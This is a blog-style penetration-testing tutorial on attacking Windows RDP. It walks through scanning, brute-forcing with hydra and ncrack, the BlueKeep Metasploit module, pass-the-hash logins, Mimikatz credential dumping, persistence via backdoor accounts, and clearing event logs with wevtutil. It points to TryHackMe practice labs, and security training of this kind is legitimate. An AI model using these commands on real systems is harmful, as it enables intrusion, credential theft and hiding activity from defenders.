Leave a Comment / Exploit-Services, Uncategorized / By

Cracking RDP:

Remote Desktop Protocol (RDP) is a go-to service for system administrators—and a juicy target for attackers. RDP provides GUI access to a remote Windows system, but misconfigurations, weak credentials, and unpatched systems make it a serious security risk. This guide walks through discovering, enumerating, exploiting, and abusing RDP like a pro.

1. What is RDP?

Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol used for remotely managing and interacting with Windows systems over a graphical interface.

Key Details:

  • Default Port: TCP 3389
  • Used For: Remote administration, support, and management
  • Authentication: NTLM-based, Kerberos (in domain environments), or smart card

Common Weaknesses:

  • Weak or default credentials
  • RDP enabled for all users
  • No network-level authentication (NLA)
  • Vulnerable services (e.g., BlueKeep)
  • Credential reuse or exposed creds

2. Scanning for RDP

Nmap

nmap -p 3389 -sV <target>

To detect RDP and version info.

Nmap Scripts

nmap -p 3389 --script=rdp-ntlm-info,rdp-enum-encryption <target>
  • rdp-ntlm-info: Reveals domain info and NetBIOS names
  • rdp-enum-encryption: Checks encryption support

3. RDP Enumeration

Once port 3389 is open, it’s time to probe further.

rdp-sec-check (Metasploit)

use auxiliary/scanner/rdp/rdp_sec_check

Checks for common RDP vulnerabilities and config issues.

crackmapexec

cme rdp <target> -u <user> -p <pass>

Tests credentials against RDP. Fast and efficient when you have username/password or hashes.

ncrack (for brute-force)

ncrack -p 3389 -U users.txt -P passwords.txt <target>

Be cautious—RDP brute-forcing can easily trigger account lockouts in AD environments.

4. RDP Exploitation Techniques

This is where RDP gets spicy.

Weak/Guessable Credentials

Many orgs expose RDP externally or internally with poor creds.
Use:

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://<target>

BlueKeep (CVE-2019-0708)

A remote code execution vulnerability in older Windows systems.

  • Use Metasploit or community PoCs (notoriously unstable):
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Check first with:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

Cred Stuffing + RDP Login

If you’ve found NTLM hashes or plain creds, RDP is a great way to gain GUI access.

  • Tools like xfreerdp or rdesktop let you log in from Linux:
xfreerdp /u:<user> /p:<pass> /v:<target>

With hash:

xfreerdp /u:<user> /pth:<hash> /v:<target>

RDP Relay Attacks

If SMB signing is disabled and NTLMv1 is in use, use Responder + ntlmrelayx to potentially get RDP logins.

5. Post-Exploitation

Once you’ve got RDP access, treat it like being in front of the machine.

File Access

  • Copy files to/from the box using clipboard or mapped drives.
  • Dump SAM, SYSTEM, SECURITY hives using Mimikatz or reg save.

Credential Dumping

Use Mimikatz (GUI or upload a dropper):

Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Persistence

If you plan on keeping access:

  • Create a new user and add to Administrators
  • Install a scheduled task for callback access
  • Backdoor mstsc.exe or drop RDP wrap tools

Clean Your Tracks

Delete any tools used, clear event logs if appropriate:

wevtutil cl security
wevtutil cl system

TryHackMe Rooms to Practice RDP

  • Blue – Features EternalBlue, but has RDP components.
  • Metasploit – Explores MSF usage, including BlueKeep.
  • CC: RDP Abuse – Focused practice on abusing and misconfiguring RDP (if available).

Final Thoughts

RDP is a heavyweight in Windows environments. When misconfigured or combined with leaked credentials, it becomes a golden ticket to GUI-based control of a system—and the potential to move laterally or escalate privileges quickly.

Stay quiet, stay smart, and if you’re inside, remember: screenshots are proof, but shells are king.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top